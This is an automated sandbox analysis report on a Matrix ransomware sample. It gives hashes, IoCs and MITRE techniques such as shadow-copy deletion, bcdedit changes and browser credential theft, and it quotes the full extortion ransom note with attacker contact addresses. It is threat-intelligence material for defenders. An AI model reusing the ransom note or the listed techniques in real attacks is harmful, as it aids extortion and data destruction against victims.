matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Size

1.2MB
MD5

607d292bdcdde297252e002e613282ae
SHA1

0161d2dd582d064f7e7f50ccb43478ff0884916a
SHA256

0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65
SHA512

2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8
SSDEEP

24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\#ANN_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 3F77FA2F861E3C4B\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cUPmiEDYswzWC3ZmbtybDJeUNHqSpERL1\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 3F77FA2F861E3C4B\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 JRgRh2tN\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\SetupMetrics\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ml\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\nl\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\fr\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files (x86)\Google\Update\Install\{13D35E3E-D723-4ADE-A208-2AB0A3B02FDA}\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Notifications\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\af\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\bg\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6m8kj4bi.default-release\settings\main\ms-language-packs\browser\newtab\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\tr\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\ProgramData\Microsoft\ClickToRun\ProductReleases\71778C52-5E2C-4CFF-B3EE-D06C1EE20FB9\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sl\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\Java\jre-1.8\lib\amd64\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\odt\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\es\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\pl\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\Java\jre-1.8\legal\jdk\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\el\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\iw\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\pl\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6m8kj4bi.default-release\cache2\entries\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#ANN_README#.rtf	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3168	bcdedit.exe
5236	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
157	4832	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	aZQFKO5164.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	aZQFKO5164.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 3 IoCs

pid	Process
640	NWavTkgQ.exe
2812	aZQFKO51.exe
2064	aZQFKO5164.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4200	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0010000000023111-515.dat	upx
behavioral2/memory/2812-519-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/2812-5339-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Music\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
